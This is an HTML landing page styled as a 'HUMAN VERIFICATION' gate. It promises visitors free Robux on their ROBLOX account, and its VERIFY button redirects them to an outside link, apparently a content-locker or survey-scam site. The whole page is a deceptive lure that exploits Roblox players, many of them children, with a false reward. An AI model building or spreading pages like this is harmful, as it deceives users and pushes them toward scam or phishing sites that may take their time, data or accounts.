<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>HUMAN VERIFICATION</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
      #main {
        background: url("/mainbg.png") no-repeat center/cover;
      }
    </style>
    <meta name="robots" content="noindex, nofollow">
  </head>
  <body>
    <div
      id="main"
      class="h-screen flex justify-center items-center text-center relative"
    >
      <div
        class="absolute text-white bg-black rounded-lg p-5 lg:w-2/6 w-fit mx-5"
      >
        <h1 class="mb-5 text-2xl font-bold flex items-center justify-center">
          <img src="logo.jpg" alt="logo" class="h-10" />!HUMAN VERIFICATION! :(
        </h1>

        <p>
          Click the button below to verify. <br />After verification check your
          ROBLOX account for free Robux.
        </p>
        <button
          class="bg-blue-600 px-5 py-2 mt-5 hover:bg-white hover:text-black"
          onclick="verify()"
        >
          VERIFY
        </button>
      </div>
    </div>
  </body>

  <script>
    function verify() {
      window.location.href = "https://verifyuser.org/cl/i/5k8dm1";
    }
  </script>
</html>
